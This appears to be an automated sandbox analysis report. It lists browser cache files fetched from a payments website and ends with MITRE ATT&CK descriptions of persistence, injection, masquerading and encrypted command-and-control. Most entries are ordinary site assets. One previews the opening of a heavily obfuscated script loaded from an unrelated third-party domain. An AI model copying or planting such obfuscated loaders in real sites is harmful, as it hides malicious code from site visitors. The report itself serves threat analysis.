SHA-512:	63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
Preview:	!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,""")+'"></a>',d.childNodes[0].getAttribute("href")\|\|""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r

Chrome Cache Entry: 134

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	1044
Entropy (8bit):	7.680182532376457
Encrypted:	false
SSDEEP:
MD5:	F9293EDB781BCFC3D86EE678A784C9FF
SHA1:	596BD48C510C90A958C6B60B09494D41C9F41502
SHA-256:	B46B6BB22DC946A587F7DF72E3ED54B8E7F1ED971F6EE4520FC0561292FF73AA
SHA-512:	F8EED66F9E170F279DD70CE43767CCE536913DD321CE4529C7A14E2C702D345A60A04BB56ECA986B51C796B6CA9FA6DEC6920DDC2C390E80D1A672CBC895B13D
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/uploads/2023/01/cropped-improving_payments_White-32x32.png
Preview:	.PNG........IHDR... ... .....szz.....IDATx...[L.W..q.].t.....).nil.Mh.`.1Uk...i"lZ..X..j.......5h....b.7.x...!...F..bP......s....ur.w.....4..~3..=g..X.P..dd...T...A`<^...I.O."d.tp...w......4~.{.......6..._H"t.n.:..5..6da..G'.!.~...Q.H`%..hC%.O...w./nC@......g.'a+1...V..I.........,.4....M h:....a......>....aSx/6abU.W........z...UT....."<......{=4..(F...a<.D ....a.\....!H.........l@.n."...6....!.z....@5.)......Y.~.3p.2B'.!._..t..+.0....(p....7...)..p.-.E.t^.0^..E....rK~...dc...1..R.T.6 .i.._a.1.S..}.Q....V......f..>..?N.F..Q....cT.ZL._%.F."....X.Jq..Q.8.tU.6..(J...9...Z.F....@.sq.cU.\|.'.&.:L.C+z....g! -..p....Nb..\8.+...0v..Y....ft h.J. {..o..x.>H..~.KU`>nCFhE.^C9nB\E..u.z..h.T....U.rq.4....N.....xs...z.\4A4.u..B'~.}H.....'V._1...y...z..\S.........p...al.8h..W\B.na'...zm......5"..P+b"*..Q..K...../f..=.9h.4..b$E.)q...0..sd.......S..w..cc....]..nl.H4..,L..........b).!..q.~..Q.4.Kh....0.z.X..sx...\|..9..o..q.......7.`.p\|.hp..,....I\.m4......!.)#

Chrome Cache Entry: 135

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (59904), with no line terminators
Category:	downloaded
Size (bytes):	59904
Entropy (8bit):	4.668994899901222
Encrypted:	false
SSDEEP:
MD5:	9093E0C93D6FF18C21CDAC4B6170DD89
SHA1:	21AFDCAE27345B403D5A3F92B6E6491BDC784653
SHA-256:	823113963CA9249AF9C19815593344A05AEC2BB85F6AAA6EDEE914E2B6CE44AA
SHA-512:	815C4C9C2596A170B5ED54438F9B4AA5E9764171B7A02EA54DCEDEE81E0FFA40CCB80EA3457C4C35369EE54B62B808DF032A391C868A2B1C80F73C82F96271CF
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/uploads/astra-addon/astra-addon-660af4587aaf00-77822469.css?ver=4.0.1
Preview:	.ast-page-builder-template .ast-article-post{margin-bottom:2.5em}.ast-featured-post{float:none}.ast-separate-container .ast-separate-posts.ast-article-post{margin-bottom:2em}.ast-animate-hidden{visibility:hidden;opacity:0}.ast-animate-display{visibility:visible;opacity:1}.ast-no-thumb .ast-date-meta .posted-on{margin-bottom:1.5em}.ast-date-meta.circle .posted-on{border-radius:50%;overflow:hidden}.has-post-thumbnail .ast-date-meta.circle .posted-on{margin:1em}.ast-separate-container .ast-grid-1 .blog-layout-1{padding:0}.ast-separate-container .ast-grid-1 .blog-layout-2,.ast-separate-container .ast-grid-1 .blog-layout-3{padding:0;border-bottom:0}.ast-separate-container .ast-grid-2 .ast-article-post,.ast-separate-container .ast-grid-3 .ast-article-post,.ast-separate-container .ast-grid-4 .ast-article-post{background:0 0}.ast-separate-container .ast-grid-2 .ast-article-post .blog-layout-2,.ast-separate-container .ast-grid-2 .ast-article-post .blog-layout-3,.ast-separate-container .ast-grid

Chrome Cache Entry: 136

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4918)
Category:	downloaded
Size (bytes):	4958
Entropy (8bit):	5.390412287804772
Encrypted:	false
SSDEEP:
MD5:	4823637838D1B4C2FEA531ABB3AFCCE1
SHA1:	898E97D64A51CA26B2824CAA2AD831F68705A441
SHA-256:	4DE82973751E1A4E2996C44C92020C354FA7E5CA4D76EE1AE53A1425B9B628E4
SHA-512:	2A26F5D2FEAB4AB643590AB0826529D52E70F3D108E45B9A5D03B872798E189C69B73EAB2A564375BAE3C43AE4516D352BFE35A5406665F27D58FC6CC2FEF0CB
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.11.1
Preview:	/! elementor - v3.11.1 - 15-02-2023 /.(()=>{"use strict";var e,r,_,t,i,a={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return a[e](_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=a,e=[],__webpack_require__.O=(r,_,t,i)=>{if(!_){var a=1/0;for(c=0;c<e.length;c++){for(var[_,t,i]=e[c],n=!0,o=0;o<_.length;o++)(!1&i\|\|a>=i)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[o])))?_.splice(o--,1):(n=!1,i<a&&(a=i));if(n){e.splice(c--,1);var u=t();void 0!==u&&(r=u)}}return r}i=i\|\|0;for(var c=e.length;c>0&&e[c-1][2]>i;c--)e[c]=e[c-1];e[c]=[_,t,i]},_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,__webpack_require__.t=function(e,t){if(1&t&&(e=this(e)),8&t)return e;if("object"==typeof e&&e){if(4&t&&e.__esModule)return e;if(16&t&&"function"==typeof e.then)return e}var i=Object.create(null);__webpack_require__.r(i);var a={};r=r\|\|[null,_({}),_([]),_(_)];for(var n=2&t&&e;"object"==typeo

Chrome Cache Entry: 137

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (15752)
Category:	downloaded
Size (bytes):	18726
Entropy (8bit):	4.756109283632968
Encrypted:	false
SSDEEP:
MD5:	B976B651932BFD25B9DDB5B7693D88A7
SHA1:	7FCB7CB5C11227F9213B1E08A07D0212209E1432
SHA-256:	4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
SHA-512:	A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-includes/js/wp-emoji-release.min.js?ver=6.5.2
Preview:	/! This file is auto-generated /.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u\|\|(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v

Chrome Cache Entry: 138

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (10069)
Category:	downloaded
Size (bytes):	10109
Entropy (8bit):	4.429196767538415
Encrypted:	false
SSDEEP:
MD5:	19B95EE2269F49A3AA96A550F548D98B
SHA1:	F7E1B5D987DB7974CDC3A74CE53E9F3285E6ABA3
SHA-256:	AC0C54BA0F76834FDA4621C42D0ACC752CD7500EF2B039AFD91A882E2AE54562
SHA-512:	590075B1B6AD695FFD7154FED31028133B8761377F5FCF7D2D28783DB05C516B9290E034758E8CD47EF83339D35DEC6D1EA374DA18F5AF790DBD467DC5B1FC21
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css
Preview:	/! elementor - v3.11.1 - 15-02-2023 /..elementor-widget-icon-box .elementor-icon-box-wrapper{display:block;text-align:center}.elementor-widget-icon-box .elementor-icon-box-icon{margin-bottom:var(--icon-box-icon-margin,15px);margin-right:auto;margin-left:auto}@media (min-width:768px){.elementor-widget-icon-box.elementor-vertical-align-top .elementor-icon-box-wrapper{align-items:flex-start}.elementor-widget-icon-box.elementor-vertical-align-middle .elementor-icon-box-wrapper{align-items:center}.elementor-widget-icon-box.elementor-vertical-align-bottom .elementor-icon-box-wrapper{align-items:flex-end}}.elementor-widget-icon-box.elementor-position-left .elementor-icon-box-wrapper,.elementor-widget-icon-box.elementor-position-right .elementor-icon-box-wrapper{display:flex}.elementor-widget-icon-box.elementor-position-left .elementor-icon-box-icon,.elementor-widget-icon-box.elementor-position-right .elementor-icon-box-icon{display:inline-flex;flex:0 0 auto}.elementor-widget-icon-box.elemen

Chrome Cache Entry: 139

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (36419)
Category:	downloaded
Size (bytes):	36460
Entropy (8bit):	5.286699001884056
Encrypted:	false
SSDEEP:
MD5:	5FA33164A5E68ABCF75E51B6A29AC0F5
SHA1:	A23D1D5269FEC85EA8366F836D94CD2113B4802F
SHA-256:	9616C2E19B686804FE1EFED0D503A3BE2F0BB6F909E31750E5D01D3377778437
SHA-512:	483A24C1B2CAE3FA28A47A9F0A01E2E9B9AAB4CB1CE44BF62FD5FE07DC853B1C62451FBD3337A44376B443514A27352CFF4C13025275BDCBCAD0760BE640F3F5
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.11.1
Preview:	/! elementor - v3.11.1 - 15-02-2023 /.(self.webpackChunkelementor=self.webpackChunkelementor\|\|[]).push([[354],{381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];for(const n of t)if(e.constructor.name===n.prototype[Symbol.toStringTag])return!0;return!1}},8135:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.ViewModule{getDefaultSettings(){return{selectors:{elements:".elementor-element",nestedDocumentElements:".elementor .elementor-element"},classes:{editMode:"elementor-edit-mode"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$elements:this.$element.find(e.elements).not(this.$element.find(e.nestedDocumentElements))}}getDocumentSettings(e){let t;if(this.isEdit){t={};const e=elementor.settings.page.model;jQuery.each(e.getActiveControls(),(n=>{t[n]=e.attributes[n]}))}else t=this.$element.data("elementor-sett

Chrome Cache Entry: 140

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	C source, ASCII text, with very long lines (4014), with no line terminators
Category:	downloaded
Size (bytes):	4014
Entropy (8bit):	5.270926250216877
Encrypted:	false
SSDEEP:
MD5:	84CDF2AF726EA0AD5C67B7EC6479E363
SHA1:	BBA43108F022EAA28A7637C1ED7B7CB287D1691D
SHA-256:	8A3820962C15D26C4CDC9EFF4F8C66ED29F96E353B7893285CB14962D6A6956D
SHA-512:	F33EFCC2B5CEF492D562AFF1EC40006A9620B57A82EFF925A63F163C56E4B05F930E682141A81FF0180326A7B6A91F9D5877FF5DCDD786241A85EA8AE2C03A76
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/wpforms-lite/assets/lib/mailcheck.min.js?ver=1.1.2
Preview:	/! mailcheck v1.1.2 @licence MIT /var Mailcheck={domainThreshold:2,secondLevelThreshold:2,topLevelThreshold:2,defaultDomains:["msn.com","bellsouth.net","telus.net","comcast.net","optusnet.com.au","earthlink.net","qq.com","sky.com","icloud.com","mac.com","sympatico.ca","googlemail.com","att.net","xtra.co.nz","web.de","cox.net","gmail.com","ymail.com","aim.com","rogers.com","verizon.net","rocketmail.com","google.com","optonline.net","sbcglobal.net","aol.com","me.com","btinternet.com","charter.net","shaw.ca"],defaultSecondLevelDomains:["yahoo","hotmail","mail","live","outlook","gmx"],defaultTopLevelDomains:["com","com.au","com.tw","ca","co.nz","co.uk","de","fr","it","ru","net","org","edu","gov","jp","nl","kr","se","eu","ie","co.il","us","at","be","dk","hk","es","gr","ch","no","cz","in","net","net.au","info","biz","mil","co.jp","sg","hu","uk"],run:function(a){a.domains=a.domains\|\|Mailcheck.defaultDomains,a.secondLevelDomains=a.secondLevelDomains\|\|Mailcheck.defaultSecondLevelDomains,a.top

Chrome Cache Entry: 141

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (31328)
Category:	downloaded
Size (bytes):	31329
Entropy (8bit):	4.81717354454148
Encrypted:	false
SSDEEP:
MD5:	2FEC937CAB990CE421DA1A2CFD88A4EC
SHA1:	390BB264F357F2115FA2DCA78000674128844A51
SHA-256:	09B3633DA7ECB14FA7028F4D023C34ED5B4DEB93DE6C7EA03C83693C1CB0EB21
SHA-512:	240AAB0D8C0B10A19388DE65BA6CF87F8340846831A65BD1CDCBA6FA3087850EF957E1B9953B084F03BD363BFB7B568ACB31DBB85BC807E9AC5483498C69A5F8
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/wpforms-lite/assets/css/wpforms-base.min.css?ver=1.8.0.1
Preview:	.wpforms-container .wpforms-form .wpforms-error-alert{border:1px solid #cccccc;text-shadow:0 1px 0 rgba(255,255,255,0.5);padding:10px 15px;font-size:14px;margin:0 0 10px 0}.wpforms-container .wpforms-form .wpforms-error-alert{color:#b94a48;background-color:#f2dede;border-color:#eed3d7}div[style="z-index: 2147483647"] div[style="border-width: 11px"][style="position: absolute"][style="pointer-events: none"]{border-style:none}.wpforms-is-turnstile iframe{margin-left:-2px !important}.wpforms-container .wpforms-error-container,.wpforms-container noscript.wpforms-error-noscript{color:#990000}.wpforms-container label.wpforms-error{display:block;color:#990000;font-size:0.9em;float:none;cursor:default}.wpforms-container .wpforms-field input.wpforms-error,.wpforms-container .wpforms-field input.user-invalid,.wpforms-container .wpforms-field textarea.wpforms-error,.wpforms-container .wpforms-field textarea.user-invalid,.wpforms-container .wpforms-field select.wpforms-error,.wpforms-container

Chrome Cache Entry: 142

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (12876), with no line terminators
Category:	downloaded
Size (bytes):	12876
Entropy (8bit):	5.1179527069320745
Encrypted:	false
SSDEEP:
MD5:	BCAD7781B3E74DB2565B8424C45232CD
SHA1:	41B0D94434EF667897C06E1184B703064FFCEDA1
SHA-256:	D622534D53D3AC1095AF275F0B30274FCD835785577DF2DDE6D9398E6F7A2C8F
SHA-512:	8BF688AD357079C992136D62AD437795165F22EA1F23919611FCB756D1975D34FE2272819CFCB6B16AA79980997149F253C20334F8AB7BF133E3C91B3F9E98B7
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css?ver=5.3.6
Preview:	.swiper-container{margin-left:auto;margin-right:auto;position:relative;overflow:hidden;z-index:1}.swiper-container .swiper-slide figure{line-height:0}.swiper-container .elementor-lightbox-content-source{display:none}.swiper-container-no-flexbox .swiper-slide{float:left}.swiper-container-vertical>.swiper-wrapper{flex-direction:column}.swiper-wrapper{position:relative;width:100%;height:100%;z-index:1;display:flex;transition-property:transform;box-sizing:content-box}.swiper-container-android .swiper-slide,.swiper-wrapper{transform:translateZ(0)}.swiper-container-multirow>.swiper-wrapper{flex-wrap:wrap}.swiper-container-free-mode>.swiper-wrapper{transition-timing-function:ease-out;margin:0 auto}.swiper-slide{flex-shrink:0;width:100%;height:100%;position:relative}.swiper-container-autoheight,.swiper-container-autoheight .swiper-slide{height:auto}.swiper-container-autoheight .swiper-wrapper{align-items:flex-start;transition-property:transform,height}.swiper-container .swiper-notification{pos

Chrome Cache Entry: 143

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (13785)
Category:	downloaded
Size (bytes):	13786
Entropy (8bit):	5.3437849678241625
Encrypted:	false
SSDEEP:
MD5:	58D15C8061659EF77D42E8C5D3FF4984
SHA1:	4FEFB78331EE102E720C03A36265F3B286DF3457
SHA-256:	709F60C4E7BE64193C1EFF6ACA024338E157DA87200E114E84B061BFED693F98
SHA-512:	B19FADFBA525AFFA4A19B99F9B204BD6C4B74BEC88CF8892B5B17F996FF79C5782680EC9B57062600483226BD58CA5893EF61B95953B206E2EE1AC009DEF2885
Malicious:	false
Reputation:	unknown
URL:	https://bind.bestresulttostart.com/xf4mKQ
Preview:	(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_0x235f74);}function _0x116976(_0x597b29,_0x2fa573,_0x3e42bd,_0x196188,_0x53fc96){return _0x58cd(_0x597b29-0x1ee,_0x53fc96);}var _0x1430f8=_0x123a19();function _0x511da3(_0xf22f,_0x15463b,_0x1f767f,_0x439083,_0x19b8cf){return _0x58cd(_0x439083-0x202,_0x1f767f);}function _0x225522(_0x6ff1da,_0x442c73,_0x470e71,_0x4c5d16,_0x19b6ad){return _0x58cd(_0x442c73-0xb2,_0x6ff1da);}while(!![]){try{var _0xa9e9da=parseInt(_0x15d07a(-0x10a,-0x110,-0x123,'Zwyr',-0x11d))/(-0x1699+-0x23-0x97+0x1f50x1)+parseInt(_0x15d07a(-0xe2,-0x106,-0x12f,'qMqR',-0x102))/(0xcb+-0x90x2c5+0x1824)(parseInt(_0x15d07a(-0xf7,-0x143,-0xe6,'c6gW',-0x117))/(0xced+0x3-0xa13+0x114f))+-parseInt(_0x225522('Zwyr',0x2c6,0x2ee,0x2c9,0x302))/(0xd5d+-0x1b70+0xe17)(-parseInt(_0x15d07a(-0

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65496)
Category:	downloaded
Size (bytes):	85698
Entropy (8bit):	4.774936465195385
Encrypted:	false
SSDEEP:
MD5:	14AAE242012E8A0114CD278B66023400
SHA1:	C9E14F21772E08F065A5DF7988943070D08A4032
SHA-256:	11A9015A1AA0195411CD9CF874386967BBA2F1E663403D7685ED16673DDAACE6
SHA-512:	24BD248DE7492919B965443CB7B10FF14B6F0F48E3B694A14797100585CD0E999BAD59C7088026029335DC31A29A230ABD848F5208FFE927CEB07CBB5EFF66B7
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=3.11.1
Preview:	/! elementor - v3.11.1 - 15-02-2023 /..dialog-widget-content{background-color:#fff;position:absolute;border-radius:3px;box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);overflow:hidden}.dialog-message{font-size:12px;line-height:1.5;box-sizing:border-box}.dialog-type-lightbox{position:fixed;height:100%;width:100%;bottom:0;left:0;background-color:rgba(0,0,0,.8);z-index:9999;-webkit-user-select:none;-moz-user-select:none;user-select:none}.dialog-type-lightbox .dialog-widget-content{margin:auto;width:400px}.dialog-type-lightbox .dialog-header{font-size:15px;color:#495157;padding:30px 0 10px;font-weight:500}.dialog-type-lightbox .dialog-message{padding:0 30px 30px;min-height:50px}.dialog-type-lightbox:not(.elementor-popup-modal) .dialog-header,.dialog-type-lightbox:not(.elementor-popup-modal) .dialog-message{text-align:center}.dialog-type-lightbox .dialog-buttons-wrapper{border-top:1px solid #e6e9ec;text-align:center}.dialog-type-lightbox .dialog-buttons-wrapper>.dialog-button{font-family:Roboto

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	87553
Entropy (8bit):	5.262620498676155
Encrypted:	false
SSDEEP:
MD5:	826EB77E86B02AB7724FE3D0141FF87C
SHA1:	79CD3587D565AFE290076A8D36C31C305A573D18
SHA-256:	CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
SHA-512:	FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Preview:	/! jQuery v3.7.1 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n\|\|C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1572)
Category:	downloaded
Size (bytes):	7989
Entropy (8bit):	5.404300576524872
Encrypted:	false
SSDEEP:
MD5:	D2F4C92DB038787FDE54C44AC984C40C
SHA1:	EAA0E134343505681B1C76BDA9393329AC30432B
SHA-256:	C2C8352EB0FDDA76CB1A3F19D958AEE2B88BAE4DB3B3F41CC75892493A856593
SHA-512:	55B64C3CEB7A2913EF42FCEB91C671857AF0EDCA125D883E94BCE1805FD0C72B65CA846B4E3CB9ABC3BDF5E266BA86531D042AB6B1E3597D58CC8D127480420A
Malicious:	false
Reputation:	unknown
URL:	https://improvingpayments.com/wp-content/astra-local-fonts/astra-local-fonts.css?ver=4.0.2
Preview:	/* hebrew /.@font-face {. font-family: 'Heebo';. font-style: normal;. font-weight: 500;. font-display: fallback;. src: url(https://improvingpayments.com/wp-content/astra-local-fonts/heebo/NGSpv5_NC0k9P_v6ZUCbLRAHxK1Euyysd0mm_00.woff2) format('woff2');. unicode-range: U+0590-05FF, U+200C-2010, U+20AA, U+25CC, U+FB1D-FB4F;.}./ math */.@font-face {. font-family: 'Heebo';. font-style: normal;. font-weight: 500;. font-display: fallback;. src: url(https://improvingpayments.com/wp-content/astra-local-fonts/heebo/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EuyysCUmm_00.woff2) format('woff2');. unicode-range: U+0302-0303, U+0305, U+0307-0308, U+0330, U+0391-03A1, U+03A3-03A9, U+03B1-03C9, U+03D1, U+03D5-03D6, U+03F0-03F1, U+03F4-03F5, U+2034-2037, U+2057, U+20D0-20DC, U+20E1, U+20E5-20EF, U+2102, U+210A-210E, U+2110-2112, U+2115, U+2119-211D, U+2124, U+2128, U+212C-212D, U+212F-2131, U+2133-2138, U+213C-2140, U+2145-2149, U+2190, U+2192, U+2194-21AE, U+21B0-21E5, U+21F1-21F2, U+21F4-2211, U+2213-2

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1536x512, components 3
Category:	dropped
Size (bytes):	136489
Entropy (8bit):	7.9886063892870505
Encrypted:	false
SSDEEP:
MD5:	7BB3A4F9B14404E12FF1B819D9CDF344
SHA1:	5441DFE8D98D43BFA9960E62444871C0E15E002B
SHA-256:	6D881E87E4467CEA670E8468944FB074C27F877485F773AFB146A73548237F9C
SHA-512:	14E05E0AF6CC4BA5CB32CE047E6ED06BB6E70D5FDAB6E7D72625DD0F7B904170B171ECEBA88EC31F7C6D3BE57F785A0BB929AEC4D96D5F37C623C3CFCF20427E
Malicious:	false
Reputation:	unknown
Preview:	......JFIF...................................................!........'.."#%%%..),($+!$%$...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......................6.....................................................................g9.z..f..$.$.Df..O.&.....L.%.k\fK:[........kl..j.;.......]._?.o..\=y^...=..8..U1.%....}1".c..8h.!).rA....~?v.u>tY."...+.o..}..S5..^.;..X..u....:.d....._..^ff....._&...^.dA.k.........N."...x......\.!\|...t&tlX.y.u....% .X..7..7...C...k....;..-?..U....._GW..[..W...z..,...7)..!\.k.w^P.....!N.,8Zvk........K.....u.")+7.9z..y.].Q...t..b.C.o..s....}.......$...:].V.J....y.X........o$N}..v..^:).2tX.k....L<Qj...6:.fH5\|o.>y..v.}2.)..t...dmgg..ky.Y...s..&...!...k.UR:rz.....Z...3..\|..O6A...!.Wz\|3..!.x.~su.Mq~..-..\t..J?.......s.Wy.i..Ih0.m.MF.-.).....c.>.../....7.2.#\|Pq.....g5....v;..?..?.P.&B+l..............O.8r.,:.V./GJ.&.$..s.......p.i.w.........uJ.[.9_(E.^.h..W.3y.=.,.g...,..5$!9Pt..:..\|....z....\|.l.........

Static File Info

⊘No static file info

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

